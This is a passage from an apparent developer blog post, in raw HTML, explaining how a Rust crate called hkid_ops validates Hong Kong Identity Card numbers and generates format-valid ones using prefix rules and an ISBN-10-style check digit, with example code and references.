class="p">(</span><span class="s">"Missing prefix in HKID"</span><span class="p">)</span><span class="o">?</span><span class="nf">.as_str</span><span class="p">();</span> <span class="k">let</span> <span class="n">digits</span> <span class="o">=</span> <span class="n">caps</span><span class="nf">.get</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="nf">.ok_or</span><span class="p">(</span><span class="s">"Missing digits in HKID"</span><span class="p">)</span><span class="o">?</span><span class="nf">.as_str</span><span class="p">();</span> <span class="k">let</span> <span class="n">provided_digit</span> <span class="o">=</span> <span class="n">caps</span><span class="nf">.get</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span><span class="nf">.ok_or</span><span class="p">(</span><span class="s">"Missing check digit in HKID"</span><span class="p">)</span><span class="o">?</span><span class="nf">.as_str</span><span class="p">();</span> <span class="k">if</span> <span class="n">must_exist_in_enum</span> <span class="p">{</span> <span class="k">let</span> <span class="n">parsed_prefix</span> <span class="o">=</span> <span class="nn">HKIDPrefix</span><span class="p">::</span><span class="nf">parse</span><span class="p">(</span><span class="n">prefix</span><span class="p">);</span> <span class="k">if</span> <span class="o">!</span><span class="n">parsed_prefix</span><span class="nf">.is_known</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Prefix '{prefix}' is not recognized."</span><span class="p">));</span> <span class="p">}</span> <span class="p">}</span> <span class="k">let</span> <span class="n">hkid_body</span> <span class="o">=</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"{prefix}{digits}"</span><span class="p">);</span> <span class="k">let</span> <span class="n">calculated_digit</span> <span class="o">=</span> <span class="k">self</span><span class="nf">.calculate_check_digit</span><span class="p">(</span><span class="o">&amp;</span><span class="n">hkid_body</span><span class="p">)</span> <span class="nf">.ok_or_else</span><span class="p">(||</span> <span class="s">"Failed to calculate check digit"</span><span class="nf">.to_string</span><span class="p">())</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">provided_digit</span> <span class="o">=</span> <span class="n">provided_digit</span><span class="nf">.chars</span><span class="p">()</span><span class="nf">.next</span><span class="p">()</span><span class="nf">.ok_or_else</span><span class="p">(||</span> <span class="s">"Missing check digit"</span><span class="nf">.to_string</span><span class="p">())</span><span class="o">?</span><span class="p">;</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">calculated_digit</span> <span class="o">==</span> <span class="n">provided_digit</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <h2> 7. How to Generate and Validate Hong Kong Identity Card Numbers </h2> <p> <br> To generate a Hong Kong Identity Card (HKID) number, begin by providing an optional prefix, which must consist of one or two uppercase letters.</p> <p>If the prefix is supplied and validation against known HKID prefixes is required, the function checks whether the prefix is recognized. If no prefix is provided, a random prefix is generated; this prefix is selected from known values if validation is required, or chosen as any one or two-letter uppercase combination otherwise.</p> <p>Six random digits are then appended to the chosen prefix to form the HKID body. A check digit is calculated based on this body, and the complete HKID is constructed in the format dddddd(C), where d represents a digit and C is the computed check digit.</p> <p>The function returns the generated HKID string or an error if validation fails.</p> <p> <br> <strong>Example: Generating an HKID with a Specific Prefix</strong></p> <p>Suppose the goal is to generate an HKID with the prefix <code>"A"</code> and require that the prefix must be recognized (i.e., <code>must_exist_in_enum = true</code>).</p> <ol> <li>The function checks that the prefix <code>"A"</code> is in the correct format (one or two uppercase letters) and is recognized.</li> <li>Six random digits are generated, for example: <code>123456</code>.</li> <li>The HKID body is formed by combining the prefix and digits: <code>A123456</code>.</li> <li>A check digit is calculated for the body. Suppose the result is <code>3</code>.</li> <li>The final HKID is constructed in the format: <code>A123456(3)</code>.</li> </ol> <p><strong>Example Code:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">use</span> <span class="nn">hkid_ops</span><span class="p">::</span><span class="nn">hkid_ops</span><span class="p">::</span><span class="n">HKIDOps</span><span class="p">;</span> <span class="k">let</span> <span class="n">ops</span> <span class="o">=</span> <span class="nn">HKIDOps</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span> <span class="k">let</span> <span class="n">hkid</span> <span class="o">=</span> <span class="n">ops</span><span class="nf">.generate_hkid</span><span class="p">(</span><span class="nf">Some</span><span class="p">(</span><span class="s">"A"</span><span class="p">),</span> <span class="k">true</span><span class="p">)</span><span class="nf">.unwrap</span><span class="p">();</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Generated HKID: {}"</span><span class="p">,</span> <span class="n">hkid</span><span class="p">);</span> <span class="c1">// Output: e.g. "A123456(3)"</span> </code></pre> </div> <p> <br> <strong>Example: Generating an HKID with a Random Prefix</strong></p> <p>Suppose the goal is to generate an HKID without specifying a prefix. In this case, the function will use a random prefix. If <code>must_exist_in_enum</code> is set to <code>true</code>, the prefix will be chosen from known valid HKID prefixes.</p> <ol> <li>No prefix is supplied, so the function selects a random known prefix, for example: <code>"M"</code>.</li> <li>Six random digits are generated, for example: <code>482951</code>.</li> <li>The HKID body is formed by combining the random prefix and digits: <code>M482951</code>.</li> <li>A check digit is calculated for the body. Suppose the result is <code>A</code>.</li> <li>The final HKID is constructed in the format: <code>M482951(A)</code>.</li> </ol> <p><strong>Example Code:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">use</span> <span class="nn">hkid_ops</span><span class="p">::</span><span class="nn">hkid_ops</span><span class="p">::</span><span class="n">HKIDOps</span><span class="p">;</span> <span class="k">let</span> <span class="n">ops</span> <span class="o">=</span> <span class="nn">HKIDOps</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span> <span class="k">let</span> <span class="n">hkid</span> <span class="o">=</span> <span class="n">ops</span><span class="nf">.generate_hkid</span><span class="p">(</span><span class="nb">None</span><span class="p">,</span> <span class="k">true</span><span class="p">)</span><span class="nf">.unwrap</span><span class="p">();</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Generated HKID: {}"</span><span class="p">,</span> <span class="n">hkid</span><span class="p">);</span> <span class="c1">// Output: e.g., "M482951(A)"</span> </code></pre> </div> <p> </p> <h3> Core Logic Implementation (Rust) </h3> <p>The following is the core logic used to generate the HKID number. For full details and functions, please visit my GitHub repo: <a href="https://github.com/iam-samleung/hkid_ops/tree/master/rust_hkid_ops" rel="noopener noreferrer">hkid_ops/rust_hkid_ops</a>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">fn</span> <span class="nf">random_known_prefix</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="o">&amp;</span><span class="k">'static</span> <span class="nb">str</span> <span class="p">{</span> <span class="k">let</span> <span class="n">idx</span> <span class="o">=</span> <span class="nn">fastrand</span><span class="p">::</span><span class="nf">usize</span><span class="p">(</span><span class="o">..</span><span class="n">KNOWN_PREFIXES</span><span class="nf">.len</span><span class="p">());</span> <span class="n">KNOWN_PREFIXES</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span> <span class="p">}</span> <span class="k">fn</span> <span class="nf">random_prefix</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">String</span> <span class="p">{</span> <span class="k">let</span> <span class="n">len</span> <span class="o">=</span> <span class="k">if</span> <span class="nn">fastrand</span><span class="p">::</span><span class="nf">bool</span><span class="p">()</span> <span class="p">{</span> <span class="mi">1</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="mi">2</span> <span class="p">};</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">s</span> <span class="o">=</span> <span class="nn">String</span><span class="p">::</span><span class="nf">with_capacity</span><span class="p">(</span><span class="n">len</span><span class="p">);</span> <span class="k">for</span> <span class="n">_</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">len</span> <span class="p">{</span> <span class="n">s</span><span class="nf">.push</span><span class="p">(</span><span class="k">Self</span><span class="p">::</span><span class="nf">random_uppercase_letter</span><span class="p">());</span> <span class="p">}</span> <span class="n">s</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">fn</span> <span class="nf">generate_hkid</span><span class="p">(</span><span class="o">&amp;</span><span class="k">self</span><span class="p">,</span> <span class="n">prefix</span><span class="p">:</span> <span class="nb">Option</span><span class="o">&lt;&amp;</span><span class="nb">str</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">must_exist_in_enum</span><span class="p">:</span> <span class="nb">bool</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">String</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">if</span> <span class="k">let</span> <span class="nf">Some</span><span class="p">(</span><span class="n">px</span><span class="p">)</span> <span class="o">=</span> <span class="n">prefix</span> <span class="p">{</span> <span class="k">if</span> <span class="o">!</span><span class="n">VALID_PREFIX_REGEX</span><span class="nf">.is_match</span><span class="p">(</span><span class="n">px</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Prefix '{px}' is not a valid HKID prefix format (must be 1 or 2 uppercase letters)"</span><span class="p">));</span> <span class="p">}</span> <span class="k">if</span> <span class="n">must_exist_in_enum</span> <span class="p">{</span> <span class="k">let</span> <span class="n">parsed_prefix</span> <span class="o">=</span> <span class="nn">HKIDPrefix</span><span class="p">::</span><span class="nf">parse</span><span class="p">(</span><span class="n">px</span><span class="p">);</span> <span class="k">if</span> <span class="o">!</span><span class="n">parsed_prefix</span><span class="nf">.is_known</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Prefix '{px}' is not recognized"</span><span class="p">));</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">let</span> <span class="n">prefix_str</span> <span class="o">=</span> <span class="k">match</span> <span class="p">(</span><span class="n">prefix</span><span class="p">,</span> <span class="n">must_exist_in_enum</span><span class="p">)</span> <span class="p">{</span> <span class="p">(</span><span class="nf">Some</span><span class="p">(</span><span class="n">px</span><span class="p">),</span> <span class="k">true</span> <span class="p">|</span> <span class="k">false</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="nn">HKIDPrefix</span><span class="p">::</span><span class="nf">parse</span><span class="p">(</span><span class="n">px</span><span class="p">)</span><span class="nf">.as_str</span><span class="p">()</span><span class="nf">.to_string</span><span class="p">(),</span> <span class="p">(</span><span class="nb">None</span><span class="p">,</span> <span class="k">true</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="k">Self</span><span class="p">::</span><span class="nf">random_known_prefix</span><span class="p">()</span><span class="nf">.to_string</span><span class="p">(),</span> <span class="p">(</span><span class="nb">None</span><span class="p">,</span> <span class="k">false</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="k">Self</span><span class="p">::</span><span class="nf">random_prefix</span><span class="p">(),</span> <span class="p">};</span> <span class="k">let</span> <span class="n">digits</span> <span class="o">=</span> <span class="p">(</span><span class="mi">0</span><span class="o">..</span><span class="mi">6</span><span class="p">)</span><span class="nf">.map</span><span class="p">(|</span><span class="n">_</span><span class="p">|</span> <span class="nn">fastrand</span><span class="p">::</span><span class="nf">u8</span><span class="p">(</span><span class="mi">0</span><span class="o">..</span><span class="mi">10</span><span class="p">)</span><span class="nf">.to_string</span><span class="p">())</span><span class="py">.collect</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">String</span><span class="o">&gt;</span><span class="p">();</span> <span class="k">let</span> <span class="n">hkid_body</span> <span class="o">=</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"{prefix_str}{digits}"</span><span class="p">);</span> <span class="k">let</span> <span class="n">check_digit</span> <span class="o">=</span> <span class="k">self</span><span class="nf">.calculate_check_digit</span><span class="p">(</span><span class="o">&amp;</span><span class="n">hkid_body</span><span class="p">)</span><span class="nf">.ok_or</span><span class="p">(</span><span class="s">"Failed to calculate check digit"</span><span class="p">)</span><span class="o">?</span><span class="p">;</span> <span class="nf">Ok</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"{hkid_body}({check_digit})"</span><span class="p">))</span> <span class="p">}</span> </code></pre> </div> <h2> 8. Rust Implementation: <a href="https://github.com/iam-samleung/hkid_ops/tree/master/rust_hkid_ops" rel="noopener noreferrer">hkid_ops</a> </h2> <p> <br> To make HKID validation and generation easier and more reliable in software projects, I have implemented the entire HKID logic in Rust and published it as both open-source code and a reusable crate.</p> <ul> <li> <p><strong>GitHub:</strong> <a href="https://github.com/iam-samleung/hkid_ops/tree/master/rust_hkid_ops" rel="noopener noreferrer">hkid_ops/rust_hkid_ops</a></p> <p>You can explore the codebase, check out the implementation details, and contribute or raise issues if you find any edge cases or want to request features.</p> </li> <li> <p><strong>Crates.io:</strong> <a href="https://crates.io/crates/hkid_ops" rel="noopener noreferrer">hkid_ops</a></p> <p>Easily include HKID validation and generation in your own Rust projects by adding <code>hkid_ops</code> to your dependencies.</p> </li> </ul> <h3> <strong>What Does the Rust Crate Provide?</strong> </h3> <ul> <li>Generate valid HKID numbers</li> <li>Verify HKID check digits</li> <li>Parse and handle HKID prefixes and symbols according to the official rules</li> </ul> <p> </p> <h2> 9. Conclusion </h2> <p> <br> The Hong Kong Identity Card (HKID) format encodes information about the cardholder and the history of card issuance through specific prefixes and symbols. The check digit is calculated using a weighted sum of the card’s characters and a modulus formula based on the ISBN-10 algorithm. This process produces a check digit value of 0–9 or ‘A’, which is used for error detection in HKID numbers.</p> <p> <br> Understanding the structure, prefix meanings, character-to-number mapping, and check digit calculation enables implementation of HKID validation and generation in software systems. The <a href="https://crates.io/crates/hkid_ops" rel="noopener noreferrer"><code>hkid_ops</code></a> crate provides functions for generating and verifying HKID numbers according to these rules.</p> <p> <br> For implementation details and sample code, refer to the <a href="https://github.com/iam-samleung/hkid_ops/tree/master/rust_hkid_ops" rel="noopener noreferrer">hkid_ops/rust_hkid_ops</a> repository.</p> <p> </p> <h2> References: </h2> <ul> <li><a href="https://en.wikipedia.org/wiki/Hong_Kong_identity_card" rel="noopener noreferrer">Hong Kong Identity Card (Wikipedia)</a></li> <li><a href="https://en.wikipedia.org/wiki/Check_digit" rel="noopener noreferrer">Check digit</a></li> <li><a href="https://en.wikipedia.org/wiki/Weight_function" rel="noopener noreferrer">Weight function</a></li> <li><a href="https://en.wikipedia.org/wiki/ISBN#ISBN-10_check_digits" rel="noopener noreferrer">ISBN</a></li> <li><a href="https://en.wikipedia.org/wiki/Modular_arithmetic" rel="noopener noreferrer">Modular arithmetic</a></li> <li><a href="https://help.sap.com/docs/successfactors-employee-central/countryregion-specifics/validation-rules-hong-kong" rel="noopener noreferrer">SAP Help Portal: HKID Validation Rules</a></li> </ul> hkid rust